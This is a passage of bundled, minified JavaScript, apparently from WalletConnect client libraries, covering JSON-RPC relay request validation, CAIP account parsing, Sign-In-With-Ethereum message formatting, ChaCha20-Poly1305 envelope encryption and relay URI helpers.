    return $d7228e581edf756b$export$3cb4ad320e3a46a4(request.method) && $d7228e581edf756b$export$6366ff9a39f2da4c(request.params);
}
function $d7228e581edf756b$export$3cb4ad320e3a46a4(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "subscription");
}
function $d7228e581edf756b$export$6366ff9a39f2da4c(params) {
    const required = [
        "id",
        "data"
    ];
    const optional = [];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}


function $a40d50f3c8928009$export$abdf96c288cb375(request) {
    if (!(0, $d7228e581edf756b$export$f576347163de0984)(request.method)) throw new Error("JSON-RPC Request has invalid subscribe method");
    if (!(0, $d7228e581edf756b$export$dae2311546d43680)(request.params)) throw new Error("JSON-RPC Request has invalid subscribe params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "topic");
    return params;
}
function $a40d50f3c8928009$export$eac3e45ac5c5c9fa(request) {
    if (!(0, $d7228e581edf756b$export$71d4d33ac7f7a269)(request.method)) throw new Error("JSON-RPC Request has invalid publish method");
    if (!(0, $d7228e581edf756b$export$71e8d1aa48c3e86f)(request.params)) throw new Error("JSON-RPC Request has invalid publish params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "topic");
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "message");
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "ttl", "number");
    return params;
}
function $a40d50f3c8928009$export$78baa72f78156594(request) {
    if (!(0, $d7228e581edf756b$export$568d956f39536025)(request.method)) throw new Error("JSON-RPC Request has invalid unsubscribe method");
    if (!(0, $d7228e581edf756b$export$cbc597c53c3b4f80)(request.params)) throw new Error("JSON-RPC Request has invalid unsubscribe params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "id");
    return params;
}
function $a40d50f3c8928009$export$4d5822edd41f3b48(request) {
    if (!(0, $d7228e581edf756b$export$3cb4ad320e3a46a4)(request.method)) throw new Error("JSON-RPC Request has invalid subscription method");
    if (!(0, $d7228e581edf756b$export$6366ff9a39f2da4c)(request.params)) throw new Error("JSON-RPC Request has invalid subscription params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "id");
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "data");
    return params;
}


const $a66838b5a814eb12$export$af490b3b9a6de00f = {
    waku: {
        publish: "waku_publish",
        batchPublish: "waku_batchPublish",
        subscribe: "waku_subscribe",
        batchSubscribe: "waku_batchSubscribe",
        subscription: "waku_subscription",
        unsubscribe: "waku_unsubscribe",
        batchUnsubscribe: "waku_batchUnsubscribe"
    },
    irn: {
        publish: "irn_publish",
        batchPublish: "irn_batchPublish",
        subscribe: "irn_subscribe",
        batchSubscribe: "irn_batchSubscribe",
        subscription: "irn_subscription",
        unsubscribe: "irn_unsubscribe",
        batchUnsubscribe: "irn_batchUnsubscribe"
    },
    iridium: {
        publish: "iridium_publish",
        batchPublish: "iridium_batchPublish",
        subscribe: "iridium_subscribe",
        batchSubscribe: "iridium_batchSubscribe",
        subscription: "iridium_subscription",
        unsubscribe: "iridium_unsubscribe",
        batchUnsubscribe: "iridium_batchUnsubscribe"
    }
};



$parcel$exportWildcard($6c5e0cebe7c6e693$exports, $7dcde13c6df73f83$exports);



var $hPtJY = parcelRequire("hPtJY");
const $a5d33cfc7f8e5437$var$k = ":";
function $a5d33cfc7f8e5437$export$4764229d78de4437(e) {
    const [n, t] = e.split($a5d33cfc7f8e5437$var$k);
    return {
        namespace: n,
        reference: t
    };
}
function $a5d33cfc7f8e5437$export$a5999672e4930644(e) {
    const { namespace: n, reference: t } = e;
    return [
        n,
        t
    ].join($a5d33cfc7f8e5437$var$k);
}
function $a5d33cfc7f8e5437$export$276ab0158c66e3d(e) {
    const [n, t, r] = e.split($a5d33cfc7f8e5437$var$k);
    return {
        namespace: n,
        reference: t,
        address: r
    };
}
function $a5d33cfc7f8e5437$export$566a25328fb93a18(e) {
    const { namespace: n, reference: t, address: r } = e;
    return [
        n,
        t,
        r
    ].join($a5d33cfc7f8e5437$var$k);
}
function $a5d33cfc7f8e5437$export$d579bc26e95946b5(e, n) {
    const t = [];
    return e.forEach((r)=>{
        const o = n(r);
        t.includes(o) || t.push(o);
    }), t;
}
function $a5d33cfc7f8e5437$export$2806d446053abd1d(e) {
    const { address: n } = $a5d33cfc7f8e5437$export$276ab0158c66e3d(e);
    return n;
}
function $a5d33cfc7f8e5437$export$93512919ec2ab555(e) {
    const { namespace: n, reference: t } = $a5d33cfc7f8e5437$export$276ab0158c66e3d(e);
    return $a5d33cfc7f8e5437$export$a5999672e4930644({
        namespace: n,
        reference: t
    });
}
function $a5d33cfc7f8e5437$export$40283ddc77f27f6e(e, n) {
    const { namespace: t, reference: r } = $a5d33cfc7f8e5437$export$4764229d78de4437(n);
    return $a5d33cfc7f8e5437$export$566a25328fb93a18({
        namespace: t,
        reference: r,
        address: e
    });
}
function $a5d33cfc7f8e5437$export$aa4a6b630dfcfa83(e) {
    return $a5d33cfc7f8e5437$export$d579bc26e95946b5(e, $a5d33cfc7f8e5437$export$2806d446053abd1d);
}
function $a5d33cfc7f8e5437$export$d5ee58c6b13696e9(e) {
    return $a5d33cfc7f8e5437$export$d579bc26e95946b5(e, $a5d33cfc7f8e5437$export$93512919ec2ab555);
}
function $a5d33cfc7f8e5437$export$23329703ad972840(e, n = []) {
    const t = [];
    return Object.keys(e).forEach((r)=>{
        if (n.length && !n.includes(r)) return;
        const o = e[r];
        t.push(...o.accounts);
    }), t;
}
function $a5d33cfc7f8e5437$export$6281ff29da5f85fe(e, n = []) {
    const t = [];
    return Object.keys(e).forEach((r)=>{
        if (n.length && !n.includes(r)) return;
        const o = e[r];
        t.push(...$a5d33cfc7f8e5437$export$d5ee58c6b13696e9(o.accounts));
    }), t;
}
function $a5d33cfc7f8e5437$export$d1109eeb751412cf(e, n = []) {
    const t = [];
    return Object.keys(e).forEach((r)=>{
        if (n.length && !n.includes(r)) return;
        const o = e[r];
        t.push(...$a5d33cfc7f8e5437$export$376384387cd15b27(r, o));
    }), t;
}
function $a5d33cfc7f8e5437$export$376384387cd15b27(e, n) {
    return e.includes(":") ? [
        e
    ] : n.chains || [];
}
const $a5d33cfc7f8e5437$export$a524ae552db7912 = (e)=>e?.split(":"), $a5d33cfc7f8e5437$export$85f23c05c80b194 = (e)=>{
    const n = e && $a5d33cfc7f8e5437$export$a524ae552db7912(e);
    if (n) return n[3];
}, $a5d33cfc7f8e5437$export$a8b149927aef7051 = (e)=>{
    const n = e && $a5d33cfc7f8e5437$export$a524ae552db7912(e);
    if (n) return n[2] + ":" + n[3];
}, $a5d33cfc7f8e5437$export$bf43cfbb4bd95de9 = (e)=>{
    const n = e && $a5d33cfc7f8e5437$export$a524ae552db7912(e);
    if (n) return n.pop();
}, $a5d33cfc7f8e5437$export$25868d1e8e76735f = (e, n)=>{
    const t = `${e.domain} wants you to sign in with your Ethereum account:`, r = $a5d33cfc7f8e5437$export$bf43cfbb4bd95de9(n), o = e.statement, s = `URI: ${e.aud}`, i = `Version: ${e.version}`, d = `Chain ID: ${$a5d33cfc7f8e5437$export$85f23c05c80b194(n)}`, l = `Nonce: ${e.nonce}`, c = `Issued At: ${e.iat}`, u = e.resources && e.resources.length > 0 ? `Resources:
${e.resources.map((a)=>`- ${a}`).join(`
`)}` : void 0;
    return [
        t,
        r,
        "",
        o,
        "",
        s,
        i,
        d,
        l,
        c,
        u
    ].filter((a)=>a != null).join(`
`);
}, $a5d33cfc7f8e5437$export$f7403969428298bd = "base10", $a5d33cfc7f8e5437$export$49eb910ab2518105 = "base16", $a5d33cfc7f8e5437$export$9bff723d552e6bcf = "base64pad", $a5d33cfc7f8e5437$export$9560dad2a83e4f04 = "utf8", $a5d33cfc7f8e5437$export$3425bd336a9673d8 = 0, $a5d33cfc7f8e5437$export$406e97c329f0f3d4 = 1, $a5d33cfc7f8e5437$var$wn = 0, $a5d33cfc7f8e5437$var$Oe = 1, $a5d33cfc7f8e5437$var$J = 12, $a5d33cfc7f8e5437$var$Q = 32;
function $a5d33cfc7f8e5437$export$a949d36eab55b41f() {
    const e = $569072827d3d60aa$exports.generateKeyPair();
    return {
        privateKey: (0, $74e9859baf4497ef$exports.toString)(e.secretKey, $a5d33cfc7f8e5437$export$49eb910ab2518105),
        publicKey: (0, $74e9859baf4497ef$exports.toString)(e.publicKey, $a5d33cfc7f8e5437$export$49eb910ab2518105)
    };
}
function $a5d33cfc7f8e5437$export$d15a28e4f1821243() {
    const e = (0, $73945d82524e104e$exports.randomBytes)($a5d33cfc7f8e5437$var$Q);
    return (0, $74e9859baf4497ef$exports.toString)(e, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$f8378f68e053f5c6(e, n) {
    const t = $569072827d3d60aa$exports.sharedKey((0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$49eb910ab2518105), (0, $74e9859baf4497ef$exports.fromString)(n, $a5d33cfc7f8e5437$export$49eb910ab2518105)), r = new (0, $eea881cb204cba82$exports.HKDF)((0, $66651f7624f8a7c0$exports.SHA256), t).expand($a5d33cfc7f8e5437$var$Q);
    return (0, $74e9859baf4497ef$exports.toString)(r, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$1e87d19d4aab5805(e) {
    const n = (0, $66651f7624f8a7c0$exports.hash)((0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$49eb910ab2518105));
    return (0, $74e9859baf4497ef$exports.toString)(n, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$d4c241cec96564c1(e) {
    const n = (0, $66651f7624f8a7c0$exports.hash)((0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$9560dad2a83e4f04));
    return (0, $74e9859baf4497ef$exports.toString)(n, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$e9d2f9ba70428fb6(e) {
    return (0, $74e9859baf4497ef$exports.fromString)(`${e}`, $a5d33cfc7f8e5437$export$f7403969428298bd);
}
function $a5d33cfc7f8e5437$export$7547a514ee29b9d4(e) {
    return Number((0, $74e9859baf4497ef$exports.toString)(e, $a5d33cfc7f8e5437$export$f7403969428298bd));
}
function $a5d33cfc7f8e5437$export$5b0f6292f11d1d18(e) {
    const n = $a5d33cfc7f8e5437$export$e9d2f9ba70428fb6(typeof e.type < "u" ? e.type : $a5d33cfc7f8e5437$export$3425bd336a9673d8);
    if ($a5d33cfc7f8e5437$export$7547a514ee29b9d4(n) === $a5d33cfc7f8e5437$export$406e97c329f0f3d4 && typeof e.senderPublicKey > "u") throw new Error("Missing sender public key for type 1 envelope");
    const t = typeof e.senderPublicKey < "u" ? (0, $74e9859baf4497ef$exports.fromString)(e.senderPublicKey, $a5d33cfc7f8e5437$export$49eb910ab2518105) : void 0, r = typeof e.iv < "u" ? (0, $74e9859baf4497ef$exports.fromString)(e.iv, $a5d33cfc7f8e5437$export$49eb910ab2518105) : (0, $73945d82524e104e$exports.randomBytes)($a5d33cfc7f8e5437$var$J), o = new (0, $1ca962bc0b1868f1$exports.ChaCha20Poly1305)((0, $74e9859baf4497ef$exports.fromString)(e.symKey, $a5d33cfc7f8e5437$export$49eb910ab2518105)).seal(r, (0, $74e9859baf4497ef$exports.fromString)(e.message, $a5d33cfc7f8e5437$export$9560dad2a83e4f04));
    return $a5d33cfc7f8e5437$export$dfdc1655ccc5b9cb({
        type: n,
        sealed: o,
        iv: r,
        senderPublicKey: t
    });
}
function $a5d33cfc7f8e5437$export$e85a0c9a1067c5d3(e) {
    const n = new (0, $1ca962bc0b1868f1$exports.ChaCha20Poly1305)((0, $74e9859baf4497ef$exports.fromString)(e.symKey, $a5d33cfc7f8e5437$export$49eb910ab2518105)), { sealed: t, iv: r } = $a5d33cfc7f8e5437$export$efcd34ab6248d3cd(e.encoded), o = n.open(r, t);
    if (o === null) throw new Error("Failed to decrypt");
    return (0, $74e9859baf4497ef$exports.toString)(o, $a5d33cfc7f8e5437$export$9560dad2a83e4f04);
}
function $a5d33cfc7f8e5437$export$dfdc1655ccc5b9cb(e) {
    if ($a5d33cfc7f8e5437$export$7547a514ee29b9d4(e.type) === $a5d33cfc7f8e5437$export$406e97c329f0f3d4) {
        if (typeof e.senderPublicKey > "u") throw new Error("Missing sender public key for type 1 envelope");
        return (0, $74e9859baf4497ef$exports.toString)((0, $74e9859baf4497ef$exports.concat)([
            e.type,
            e.senderPublicKey,
            e.iv,
            e.sealed
        ]), $a5d33cfc7f8e5437$export$9bff723d552e6bcf);
    }
    return (0, $74e9859baf4497ef$exports.toString)((0, $74e9859baf4497ef$exports.concat)([
        e.type,
        e.iv,
        e.sealed
    ]), $a5d33cfc7f8e5437$export$9bff723d552e6bcf);
}
function $a5d33cfc7f8e5437$export$efcd34ab6248d3cd(e) {
    const n = (0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$9bff723d552e6bcf), t = n.slice($a5d33cfc7f8e5437$var$wn, $a5d33cfc7f8e5437$var$Oe), r = $a5d33cfc7f8e5437$var$Oe;
    if ($a5d33cfc7f8e5437$export$7547a514ee29b9d4(t) === $a5d33cfc7f8e5437$export$406e97c329f0f3d4) {
        const d = r + $a5d33cfc7f8e5437$var$Q, l = d + $a5d33cfc7f8e5437$var$J, c = n.slice(r, d), u = n.slice(d, l), a = n.slice(l);
        return {
            type: t,
            sealed: a,
            iv: u,
            senderPublicKey: c
        };
    }
    const o = r + $a5d33cfc7f8e5437$var$J, s = n.slice(r, o), i = n.slice(o);
    return {
        type: t,
        sealed: i,
        iv: s
    };
}
function $a5d33cfc7f8e5437$export$177f3e316562333d(e, n) {
    const t = $a5d33cfc7f8e5437$export$efcd34ab6248d3cd(e);
    return $a5d33cfc7f8e5437$export$7949f60f2444aef2({
        type: $a5d33cfc7f8e5437$export$7547a514ee29b9d4(t.type),
        senderPublicKey: typeof t.senderPublicKey < "u" ? (0, $74e9859baf4497ef$exports.toString)(t.senderPublicKey, $a5d33cfc7f8e5437$export$49eb910ab2518105) : void 0,
        receiverPublicKey: n?.receiverPublicKey
    });
}
function $a5d33cfc7f8e5437$export$7949f60f2444aef2(e) {
    const n = e?.type || $a5d33cfc7f8e5437$export$3425bd336a9673d8;
    if (n === $a5d33cfc7f8e5437$export$406e97c329f0f3d4) {
        if (typeof e?.senderPublicKey > "u") throw new Error("missing sender public key");
        if (typeof e?.receiverPublicKey > "u") throw new Error("missing receiver public key");
    }
    return {
        type: n,
        senderPublicKey: e?.senderPublicKey,
        receiverPublicKey: e?.receiverPublicKey
    };
}
function $a5d33cfc7f8e5437$export$8c165704db2d5c15(e) {
    return e.type === $a5d33cfc7f8e5437$export$406e97c329f0f3d4 && typeof e.senderPublicKey == "string" && typeof e.receiverPublicKey == "string";
}
var $a5d33cfc7f8e5437$var$kn = Object.defineProperty, $a5d33cfc7f8e5437$var$Te = Object.getOwnPropertySymbols, $a5d33cfc7f8e5437$var$Mn = Object.prototype.hasOwnProperty, $a5d33cfc7f8e5437$var$Kn = Object.prototype.propertyIsEnumerable, $a5d33cfc7f8e5437$var$we = (e, n, t)=>n in e ? $a5d33cfc7f8e5437$var$kn(e, n, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : e[n] = t, $a5d33cfc7f8e5437$var$Re = (e, n)=>{
    for(var t in n || (n = {}))$a5d33cfc7f8e5437$var$Mn.call(n, t) && $a5d33cfc7f8e5437$var$we(e, t, n[t]);
    if ($a5d33cfc7f8e5437$var$Te) for (var t of $a5d33cfc7f8e5437$var$Te(n))$a5d33cfc7f8e5437$var$Kn.call(n, t) && $a5d33cfc7f8e5437$var$we(e, t, n[t]);
    return e;
};
const $a5d33cfc7f8e5437$export$f12873d77424d47b = "ReactNative", $a5d33cfc7f8e5437$export$86b1301a63b15dd9 = {
    reactNative: "react-native",
    node: "node",
    browser: "browser",
    unknown: "unknown"
}, $a5d33cfc7f8e5437$export$657dee6d5648750a = " ", $a5d33cfc7f8e5437$export$96c3628b3b9d2079 = ":", $a5d33cfc7f8e5437$export$98238152dfccf046 = "/", $a5d33cfc7f8e5437$export$7f882bb969de14a3 = 2, $a5d33cfc7f8e5437$export$77baccb4c6bd5852 = 1e3, $a5d33cfc7f8e5437$export$e08b61c98317d88c = "js";
function $a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee() {
    return typeof $hPtJY < "u" && typeof $hPtJY.versions < "u" && typeof $hPtJY.versions.node < "u";
}
function $a5d33cfc7f8e5437$export$f7a1e23e542d38e3() {
    return !(0, $9cba2bd26fe13e26$exports.getDocument)() && !!(0, $9cba2bd26fe13e26$exports.getNavigator)() && navigator.product === $a5d33cfc7f8e5437$export$f12873d77424d47b;
}
function $a5d33cfc7f8e5437$export$4e09c449d6c407f7() {
    return !$a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee() && !!(0, $9cba2bd26fe13e26$exports.getNavigator)();
}
function $a5d33cfc7f8e5437$export$57570b1603cf6adb() {
    return $a5d33cfc7f8e5437$export$f7a1e23e542d38e3() ? $a5d33cfc7f8e5437$export$86b1301a63b15dd9.reactNative : $a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee() ? $a5d33cfc7f8e5437$export$86b1301a63b15dd9.node : $a5d33cfc7f8e5437$export$4e09c449d6c407f7() ? $a5d33cfc7f8e5437$export$86b1301a63b15dd9.browser : $a5d33cfc7f8e5437$export$86b1301a63b15dd9.unknown;
}
function $a5d33cfc7f8e5437$export$c4147c69f6845da(e, n) {
    let t = $3ecb7368762fc268$export$98e6a39c04603d36(e);
    return t = $a5d33cfc7f8e5437$var$Re($a5d33cfc7f8e5437$var$Re({}, t), n), e = $3ecb7368762fc268$export$fac44ee5b035f737(t), e;
}
function $a5d33cfc7f8e5437$export$ba31e015127122bb() {
    return (0, $6824eb17eeee766a$exports.getWindowMetadata)() || {
        name: "",
        description: "",
        url: "",
        icons: [
            ""
        ]
    };
}
function $a5d33cfc7f8e5437$export$6b05aa0115b6fc2d(e, n) {
    var t;
    const r = $a5d33cfc7f8e5437$export$57570b1603cf6adb(), o = {
        protocol: e,
        version: n,
        env: r
    };
    return r === "browser" && (o.host = ((t = (0, $9cba2bd26fe13e26$exports.getLocation)()) == null ? void 0 : t.host) || "unknown"), o;
}
function $a5d33cfc7f8e5437$export$20d4a3cb5829b8b6() {
    if ($a5d33cfc7f8e5437$export$57570b1603cf6adb() === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.reactNative && typeof $parcel$global < "u" && typeof ($parcel$global == null ? void 0 : $parcel$global.Platform) < "u") {
        const { OS: t, Version: r } = $parcel$global.Platform;
        return [
            t,
            r
        ].join("-");
    }
    const e = (0, $48968958eb8b72e8$exports.detect)();
    if (e === null) return "unknown";
    const n = e.os ? e.os.replace(" ", "").toLowerCase() : "unknown";
    return e.type === "browser" ? [
        n,
        e.name,
        e.version
    ].join("-") : [
        n,
        e.version
    ].join("-");
}
function $a5d33cfc7f8e5437$export$4389b0987726d52d() {
    var e;
    const n = $a5d33cfc7f8e5437$export$57570b1603cf6adb();
    return n === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.browser ? [
        n,
        ((e = (0, $9cba2bd26fe13e26$exports.getLocation)()) == null ? void 0 : e.host) || "unknown"
    ].join(":") : n;
}
function $a5d33cfc7f8e5437$export$b55a4c6e272b719f(e, n, t) {
    const r = $a5d33cfc7f8e5437$export$20d4a3cb5829b8b6(), o = $a5d33cfc7f8e5437$export$4389b0987726d52d();
    return [
        [
            e,
            n
        ].join("-"),
        [
            $a5d33cfc7f8e5437$export$e08b61c98317d88c,
            t
        ].join("-"),
        r,
        o
    ].join("/");
}
function $a5d33cfc7f8e5437$export$d875b3963ef774f5({ protocol: e, version: n, relayUrl: t, sdkVersion: r, auth: o, projectId: s, useOnCloseEvent: i }) {
    const d = t.split("?"), l = $a5d33cfc7f8e5437$export$b55a4c6e272b719f(e, n, r), c = {
        auth: o,
        ua: l,
        projectId: s,
        useOnCloseEvent: i || void 0
    }, u = $a5d33cfc7f8e5437$export$c4147c69f6845da(d[1] || "", c);
    return d[0] + "?" + u;
}
function $a5d33cfc7f8e5437$export$ed08891a8a54eb(e) {
    let n = (e.match(/^[^:]+(?=:\/\/)/gi) || [])[0];
    const t = typeof n < "u" ? e.split("://")[1] : e;
    return n = n === "wss" ? "https" : "http", [
        n,
        t
    ].join("://");
}
function $a5d33cfc7f8e5437$export$804de46662e4ac95(e, n, t) {
    if (!e[n] || typeof e[n] !== t) throw new Error(`Missing or invalid "${n}" param`);
}
function $a5d33cfc7f8e5437$export$1e21530e896c0b0b(e, n = $a5d33cfc7f8e5437$export$7f882bb969de14a3) {
    return $a5d33cfc7f8e5437$export$7f00885504704576(e.split($a5d33cfc7f8e5437$export$98238152dfccf046), n);
}
function $a5d33cfc7f8e5437$export$80bffd46c37a96f6(e) {
    return $a5d33cfc7f8e5437$export$1e21530e896c0b0b(e).join($a5d33cfc7f8e5437$export$657dee6d5648750a);
}
function $a5d33cfc7f8e5437$export$1468a49de573f7f9(e, n) {
    return e.filter((t)=>n.includes(t)).length === e.length;
}
function $a5d33cfc7f8e5437$export$7f00885504704576(e, n = $a5d33cfc7f8e5437$export$7f882bb969de14a3) {
    return e.slice(Math.max(e.length - n, 0));
}
function $a5d33cfc7f8e5437$export$c4b8dfeb6e237eb9(e) {
    return Object.fromEntries(e.entries());
}
function $a5d33cfc7f8e5437$export$ac31b37c726bc3ba(e) {
    return new Map(Object.entries(e));
}
function $a5d33cfc7f8e5437$export$592ef47eabb05614(e, n) {
    const t = {};
    return Object.keys(e).forEach((r)=>{
        t[r] = n(e[r]);
    }), t;
}
const $a5d33cfc7f8e5437$export$85c927578394b28b = (e)=>e;
function $a5d33cfc7f8e5437$export$e9f8fcacef3bca4b(e) {
    return e.trim().replace(/^\w/, (n)=>n.toUpperCase());
}
function $a5d33cfc7f8e5437$export$9a00dee1beb8f576(e) {
    return e.split($a5d33cfc7f8e5437$export$657dee6d5648750a).map((n)=>$a5d33cfc7f8e5437$export$e9f8fcacef3bca4b(n)).join($a5d33cfc7f8e5437$export$657dee6d5648750a);
}
function $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb(e = (0, $aG48A.FIVE_MINUTES), n) {
    const t = (0, $aG48A.toMiliseconds)(e || (0, $aG48A.FIVE_MINUTES));
    let r, o, s;
    return {
        resolve: (i)=>{
            s && r && (clearTimeout(s), r(i));
        },
        reject: (i)=>{
            s && o && (clearTimeout(s), o(i));
        },
        done: ()=>new Promise((i, d)=>{
                s = setTimeout(()=>{
                    d(new Error(n));
                }, t), r = i, o = d;
            })
    };
}
function $a5d33cfc7f8e5437$export$3da2293b007ed708(e, n, t) {
    return new Promise(async (r, o)=>{
        const s = setTimeout(()=>o(new Error(t)), n);
        try {
            const i = await e;
            r(i);
        } catch (i) {
            o(i);
        }
        clearTimeout(s);
    });
}
function $a5d33cfc7f8e5437$export$187ab6574b2ae23f(e, n) {
    if (typeof n == "string" && n.startsWith(`${e}:`)) return n;
    if (e.toLowerCase() === "topic") {
        if (typeof n != "string") throw new Error('Value must be "string" for expirer target type: topic');
        return `topic:${n}`;
    } else if (e.toLowerCase() === "id") {
        if (typeof n != "number") throw new Error('Value must be "number" for expirer target type: id');
        return `id:${n}`;
    }
    throw new Error(`Unknown expirer target type: ${e}`);
}
function $a5d33cfc7f8e5437$export$43ab92477f8713b9(e) {
    return $a5d33cfc7f8e5437$export$187ab6574b2ae23f("topic", e);
}
function $a5d33cfc7f8e5437$export$bd13103c2e5cc0c3(e) {
    return $a5d33cfc7f8e5437$export$187ab6574b2ae23f("id", e);
}
function $a5d33cfc7f8e5437$export$93adeb0f16e8e51d(e) {
    const [n, t] = e.split(":"), r = {
        id: void 0,
        topic: void 0
    };
    if (n === "topic" && typeof t == "string") r.topic = t;
    else if (n === "id" && Number.isInteger(Number(t))) r.id = Number(t);
    else throw new Error(`Invalid target, expected id:number or topic:string, got ${n}:${t}`);
    return r;
}
function $a5d33cfc7f8e5437$export$b136d03015bfc12(e, n) {
    return (0, $aG48A.fromMiliseconds)((n || Date.now()) + (0, $aG48A.toMiliseconds)(e));
}
function $a5d33cfc7f8e5437$export$57947cfd429801a2(e) {
    return Date.now() >= (0, $aG48A.toMiliseconds)(e);
}
function $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9(e, n) {
    return `${e}${n ? `:${n}` : ""}`;
}
function $a5d33cfc7f8e5437$export$9826fe7ad3921016(e = [], n = []) {
    return [
        ...new Set([
            ...e,
            ...n
        ])
    ];
}
async function $a5d33cfc7f8e5437$export$694a208c8abca99a({ id: e, topic: n, wcDeepLink: t }) {
    try {
        if (!t) return;
        const r = typeof t == "string" ? JSON.parse(t) : t;
        let o = r?.href;
        if (typeof o != "string") return;
        o.endsWith("/") && (o = o.slice(0, -1));
        const s = `${o}/wc?requestId=${e}&sessionTopic=${n}`, i = $a5d33cfc7f8e5437$export$57570b1603cf6adb();
        i === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.browser ? s.startsWith("https://") ? window.open(s, "_blank", "noreferrer noopener") : window.open(s, "_self", "noreferrer noopener") : i === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.reactNative && typeof ($parcel$global == null ? void 0 : $parcel$global.Linking) < "u" && await $parcel$global.Linking.openURL(s);
    } catch (r) {
        console.error(r);
    }
}
const $a5d33cfc7f8e5437$export$822d0bd1635d5360 = "irn";
function $a5d33cfc7f8e5437$export$cf77af25151525db(e) {
    return e?.relay || {
        protocol: $a5d33cfc7f8e5437$export$822d0bd1635d5360
    };
}
function $a5d33cfc7f8e5437$export$604e3deb95e1b734(e) {
    const n = (0, $a66838b5a814eb12$export$af490b3b9a6de00f)[e];
    if (typeof n > "u") throw new Error(`Relay Protocol not supported: ${e}`);
    return n;
}
var $a5d33cfc7f8e5437$var$dt = Object.defineProperty, $a5d33cfc7f8e5437$var$Fe = Object.getOwnPropertySymbols, $a5d33cfc7f8e5437$var$lt = Object.prototype.hasOwnProperty, $a5d33cfc7f8e5437$var$ft = Object.prototype.propertyIsEnumerable, $a5d33cfc7f8e5437$var$He = (e, n, t)=>n in e ? $a5d33cfc7f8e5437$var$dt(e, n, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : e[n] = t, $a5d33cfc7f8e5437$var$pt = (e, n)=>{
    for(var t in n || (n = {}))$a5d33cfc7f8e5437$var$lt.call(n, t) && $a5d33cfc7f8e5437$var$He(e, t, n[t]);
    if ($a5d33cfc7f8e5437$var$Fe) for (var t of $a5d33cfc7f8e5437$var$Fe(n))$a5d33cfc7f8e5437$var$ft.call(n, t) && $a5d33cfc7f8e5437$var$He(e, t, n[t]);
    return e;
};
function $a5d33cfc7f8e5437$export$3d24f408c2ac468a(e, n = "-") {
    const t = {}, r = "relay" + n;
    return Object.keys(e).forEach((o)=>{
        if (o.startsWith(r)) {
            const s = o.replace(r, ""), i = e[o];
            t[s] = i;
        }
    }), t;
}
function $a5d33cfc7f8e5437$export$59f58847421cfb28(e) {
    const n = e.indexOf(":"), t = e.indexOf("?") !== -1 ? e.indexOf("?") : void 0, r = e.substring(0, n), o = e.substring(n + 1, t).split("@"), s = typeof t < "u" ? e.substring(t) : "", i = $3ecb7368762fc268$export$98e6a39c04603d36(s);
    return {
        protocol: r,
        topic: $a5d33cfc7f8e5437$export$5ddc9ebef1d00f28(o[0]),
        version: parseInt(o[1], 10),
        symKey: i.symKey,
        relay: $a5d33cfc7f8e5437$export$3d24f408c2ac468a(i)
    };
}
function $a5d33cfc7f8e5437$export$5ddc9ebef1d00f28(e) {
    return e.startsWith("//") ? e.substring(2) : e;
}
function $a5d33cfc7f8e5437$export$65c55c7ccd19bb8f(e, n = "-") {
    const t = "relay", r = {};
    return Object.keys(e).forEach((o)=>{
        const s = t + n + o;
        e[o] && (r[s] = e[o]);
    }), r;
}
function $a5d33cfc7f8e5437$export$b2786ede34fb2350(e) {
    return `${e.protocol}:${e.topic}@${e.version}?` + $3ecb7368762fc268$export$fac44ee5b035f737($a5d33cfc7f8e5437$var$pt({
        symKey: e.symKey
    }, $a5d33cfc7f8e5437$export$65c55c7ccd19bb8f(e.relay)));
}
var $a5d33cfc7f8e5437$var$ht = Object.defineProperty, $a5d33cfc7f8e5437$var$Et = Object.defineProperties, $a5d33cfc7f8e5437$var$vt = Object.getOwnPropertyDescriptors, $a5d33cfc7f8e5437$var$ze = Object.getOwnPropertySymbols, $a5d33cfc7f8e5437$var$gt = Object.prototype.hasOwnProperty, $a5d33cfc7f8e5437$var$bt = Object.prototype.propertyIsEnumerable, $a5d33cfc7f8e5437$var$Be = (e, n, t)=>n in e ? $a5d33cfc7f8e5437$var$ht(e, n, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : e[n] = t, $a5d33cfc7f8e5437$var$Nt = (e, n)=>{
    for(var t in n || (n = {}))$a5d33cfc7f8e5437$var$gt.call(n, t) && $a5d33cfc7f8e5437$var$Be(e, t, n[t]);
    if ($a5d33cfc7f8e5437$var$ze) for (var t of $a5d33cfc7f8e5437$var$ze(n))$a5d33cfc7f8e5437$var$bt.call(n, t) && $a5d33cfc7f8e5437$var$Be(e, t, n[t]);
    return e;
}, $a5d33cfc7f8e5437$var$Ot = (e, n)=>$a5d33cfc7f8e5437$var$Et(e, $a5d33cfc7f8e5437$var$vt(n));
function $a5d33cfc7f8e5437$export$d46695d9c3664fe9(e) {
    const n = [];
    return e.forEach((t)=>{
        const [r, o] = t.split(":");
